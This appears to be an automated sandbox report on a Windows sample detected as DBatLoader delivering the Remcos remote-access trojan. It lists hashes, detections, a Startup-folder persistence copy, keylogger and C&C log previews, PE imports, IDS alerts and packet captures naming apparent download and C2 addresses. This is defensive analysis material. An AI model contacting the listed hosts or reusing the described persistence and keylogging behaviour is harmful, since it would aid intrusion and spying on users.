                                              SHA-512:005658047AE5BD43D2C709C640FFD60B17A3E551657502804DBFD288193B340834E74B6A007731F401D4FC62B76CBAFDE40E5A30B08F9FB00F9506B6438C470D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 74%
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Roaming\remcos\logs.dat

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):132
                                              Entropy (8bit):5.03831135575865
                                              Encrypted:false
                                              SSDEEP:3:Nt9RKOXyfVFhMLrA4RXMRPz1f5wOUWJRWD9Mly63Qx1oy1aeo:NBKOitg/Xqdz1fuONJAxM86gxNIP
                                              MD5:0B5326158663C614FCDD8CEBDCC2A1E6
                                              SHA1:D5F60933F5BDF6F0437730E79DA6E8F41C098CD7
                                              SHA-256:0C98C6794F48EAC6995FD414FC44D15E59B93044135C462EB446088E2F5420FF
                                              SHA-512:CE48EE36586D4EB3799FE7BBA3ED7A7094D9DE92F3B1AE98FE683D35145A6E2469D41F46800D528378212293113D4CB5AD14A870DAACCF79A6C69F98F257F4FD
                                              Malicious:true
                                              Preview:..{ 2024/12/13 11:57:37 - Offline Keylogger Started! }....[ C:\Users\user\Desktop\file.exe ]..[r..[ Run ]....[ Program Manager ]..

                                              \Device\ConDrv

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):967
                                              Entropy (8bit):5.019521591495582
                                              Encrypted:false
                                              SSDEEP:24:qSDtTLOtoOErSPHah/RVDVryg6bCFDMRjhacmZ:PDhOKOq06BRpVryg6bGDMRjhacmZ
                                              MD5:52E928B852C1FF7CC62DA9E6951AD4AD
                                              SHA1:1A72CF75C6743E7D6F8F8FD215BA8994BAF984AA
                                              SHA-256:E94D27AA04D27E5FD7253AAB079513EEED2940326A8D221C505B0CF4CB5B641A
                                              SHA-512:EB4008199A4E76288D11F1A47F0886731A4953215892A2DCC18EA54056341CAE5F91EF30D1AFD0CE5136A14221B7EF6C31F0927887EC362B002F5C33F9DB3DE3
                                              Malicious:false
                                              Preview: * REMCOS v2.0.4 Pro.. * Breaking-Security.Net....11:57:37:056 [INFO] Offline Keylogger Started..11:57:37:087 [INFO] Initializing connection to C&C.....11:57:47:143 [INFO] Connected to C&C!..12:28:50:434 [INFO] Disconnected. Retrying connection.....12:36:11:159 [INFO] Connected to C&C!..13:15:50:728 [INFO] Disconnected. Retrying connection.....13:30:20:209 [INFO] Connected to C&C!..05:44:58:323 [INFO] Disconnected. Retrying connection.....22:47:13:241 [INFO] Connected to C&C!..05:06:18:925 [INFO] Disconnected. Retrying connection.....21:11:24:769 [INFO] Connected to C&C!..17:59:38:499 [INFO] Disconnected. Retrying connection.....13:41:04:354 [INFO] Connected to C&C!..22:52:30:936 [INFO] Disconnected. Retrying connection.....22:17:49:773 [INFO] Connected to C&C!..15:46:52:751 [INFO] Disconnected. Retrying connection.....00:17:28:212 [INFO] Connected to C&C!..11:29:01:652 [INFO] Disconnected. Retrying connection.....01:08:51:657 [INFO] Connected to C&C!..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.600373214988344
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.66%
                                              • Win32 Executable Delphi generic (14689/80) 0.15%
                                              • Windows Screen Saver (13104/52) 0.13%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              File name:file.exe
                                              File size:917'504 bytes
                                              MD5:21d13f2f3c4db8f083b672d81831fa5e
                                              SHA1:b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0
                                              SHA256:17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3
                                              SHA512:005658047ae5bd43d2c709c640ffd60b17a3e551657502804dbfd288193b340834e74b6a007731f401d4fc62b76cbafde40e5a30b08f9fb00f9506b6438c470d
                                              SSDEEP:12288:ZWBoBYd39letTbwm3Undsb+gfrEJLzDQ2bALSKLmDt8N90il5HyV/e4:ZeR9ItXwdnWbLrEJJrta5Hah
                                              TLSH:1215AE23BAB1A432D153253A9D475378DC28BE206E28B4D36FE93D4DEB743823417697
                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                              File Icon

                                              Icon Hash:3c258c0d8d4d597d

                                              Static PE Info

                                              General

                                              Entrypoint:0x4664d8
                                              Entrypoint Section:CODE
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                              DLL Characteristics:
                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:971f4f781c7818935ec7bc047c34d2d1

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              add esp, FFFFFFF0h
                                              push ebx
                                              mov eax, 004662D8h
                                              call 00007F6A04B21DFCh
                                              mov ebx, dword ptr [00468124h]
                                              nop
                                              mov eax, dword ptr [ebx]
                                              call 00007F6A04B71F4Ah
                                              mov ecx, dword ptr [00468210h]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045DC04h]
                                              call 00007F6A04B71F4Fh
                                              mov ecx, dword ptr [00467EF0h]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045BE40h]
                                              call 00007F6A04B71F3Ch
                                              mov ecx, dword ptr [00467ECCh]
                                              mov eax, dword ptr [ebx]
                                              mov edx, dword ptr [0045D884h]
                                              call 00007F6A04B71F29h
                                              mov eax, dword ptr [ebx]
                                              mov byte ptr [eax+5Bh], 00000000h
                                              mov eax, dword ptr [ebx]
                                              call 00007F6A04B71F9Ch
                                              pop ebx
                                              call 00007F6A04B1FA96h
                                              nop
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0000x241a.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x770000x6f4a8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f0000x73c4.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x6e0000x18.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              CODE0x10000x660000x65600f01613af568619cd0ae79db7ea53d20aFalse0.5205162415228114data6.539199210909358IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              DATA0x670000x20000x1400c2972fc1c7eecd2e501b2af2d8a69a98False0.419921875data3.883484059034863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              BSS0x690000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata0x6a0000x30000x2600df8220a7bd3f2a14fe3ef1aba1f3f5f6False0.3514597039473684data4.88778235147272IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .tls0x6d0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rdata0x6e0000x10000x2008f8bc12ba7b86dfde1ceac0574e3d88cFalse0.048828125data0.2005819074398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                              .reloc0x6f0000x80000x740029785f36ddd05cc45948468ea58523e8False0.6173221982758621data6.676272701274689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                              .rsrc0x770000x700000x6f6007c79695184c9941d63432580bf267c8cFalse0.4435106271043771data5.58402275238853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_CURSOR0x778940x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                              RT_CURSOR0x779c80x134data0.4642857142857143
                                              RT_CURSOR0x77afc0x134data0.4805194805194805
                                              RT_CURSOR0x77c300x134data0.38311688311688313
                                              RT_CURSOR0x77d640x134data0.36038961038961037
                                              RT_CURSOR0x77e980x134data0.4090909090909091
                                              RT_CURSOR0x77fcc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                              RT_ICON0x781000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.08661825726141079
                                              RT_STRING0x7a6a80xacdata0.5872093023255814
                                              RT_STRING0x7a7540x1ccdata0.40217391304347827
                                              RT_STRING0x7a9200x188data0.5025510204081632
                                              RT_STRING0x7aaa80x1b0data0.5
                                              RT_STRING0x7ac580x324data0.44154228855721395
                                              RT_STRING0x7af7c0xd8data0.5879629629629629
                                              RT_STRING0x7b0540x118data0.5678571428571428
                                              RT_STRING0x7b16c0x298data0.46686746987951805
                                              RT_STRING0x7b4040x3f8data0.3700787401574803
                                              RT_STRING0x7b7fc0x35cdata0.38953488372093026
                                              RT_STRING0x7bb580x3e8data0.33
                                              RT_STRING0x7bf400x234data0.475177304964539
                                              RT_STRING0x7c1740xecdata0.5508474576271186
                                              RT_STRING0x7c2600x1b4data0.5206422018348624
                                              RT_STRING0x7c4140x3e4data0.32028112449799195
                                              RT_STRING0x7c7f80x358data0.4158878504672897
                                              RT_STRING0x7cb500x2b4data0.4060693641618497
                                              RT_RCDATA0x7ce040x61e9bASCII text, with very long lines (65536), with no line terminators0.47509917691266196
                                              RT_RCDATA0xdeca00x9ASCII text, with no line terminators1.6666666666666667
                                              RT_RCDATA0xdecac0x6a68Delphi compiled form 'T__3389240238'0.14915565345080764
                                              RT_RCDATA0xe57140x2a4Delphi compiled form 'T__3390423973'0.7144970414201184
                                              RT_RCDATA0xe59b80x2dbDelphi compiled form 'T__3390464134'0.6580027359781122
                                              RT_GROUP_CURSOR0xe5c940x14Lotus unknown worksheet or configuration, revision 0x11.25
                                              RT_GROUP_CURSOR0xe5ca80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                              RT_GROUP_CURSOR0xe5cbc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                              RT_GROUP_CURSOR0xe5cd00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                              RT_GROUP_CURSOR0xe5ce40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                              RT_GROUP_CURSOR0xe5cf80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                              RT_GROUP_CURSOR0xe5d0c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                              RT_GROUP_ICON0xe5d200x14dataRussianRussia1.15
                                              RT_VERSION0xe5d340x774COM executable for DOS0.2112159329140461

                                              Imports

                                              DLLImport
                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CopyFileA, CompareStringA, CloseHandle
                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                              kernel32.dllSleep
                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                              shell32.dllShellExecuteA
                                              URLMON.DLLURLDownloadToFileA
                                              shfolder.dllSHGetFolderPathA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              RussianRussia

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-13T17:57:34.496629+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.54970493.125.99.12180TCP
                                              2024-12-13T17:57:38.174795+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549705154.16.63.1973360TCP
                                              2024-12-13T17:58:05.189475+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549751154.16.63.1973360TCP
                                              2024-12-13T17:58:32.236209+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549815154.16.63.1973360TCP
                                              2024-12-13T17:58:59.393580+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549878154.16.63.1973360TCP
                                              2024-12-13T17:59:26.877943+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549942154.16.63.1973360TCP
                                              2024-12-13T17:59:53.972078+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549981154.16.63.1973360TCP
                                              2024-12-13T18:00:21.020725+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549982154.16.63.1973360TCP
                                              2024-12-13T18:01:15.096357+01002829308ETPRO MALWARE MSIL/Remcos Variant CnC Checkin1192.168.2.549984154.16.63.1973360TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2024 17:57:33.072776079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:33.195360899 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:33.195480108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:33.290174007 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:33.409974098 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496464014 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496505976 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496520996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496629000 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.496661901 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496676922 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496694088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496697903 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.496710062 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496726036 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496727943 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.496752977 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.496843100 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496859074 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.496874094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.496901989 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.616681099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.616710901 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.616832018 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.620976925 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.623827934 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.688400984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.688582897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.688591003 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.688637972 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.692562103 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.692617893 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.692639112 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.692682028 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.699136972 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.699196100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.699201107 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.699243069 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.707731962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.707794905 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.707861900 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.707904100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.716506004 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.716573000 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.716586113 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.716628075 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.724396944 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.724411964 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.724464893 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.732744932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.732821941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.732841015 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.732883930 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.741240025 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.741267920 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.741305113 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.741322041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.749640942 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.749711990 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.749752045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.749790907 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.758253098 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.758312941 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.758321047 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.758349895 CET4970480192.168.2.593.125.99.121
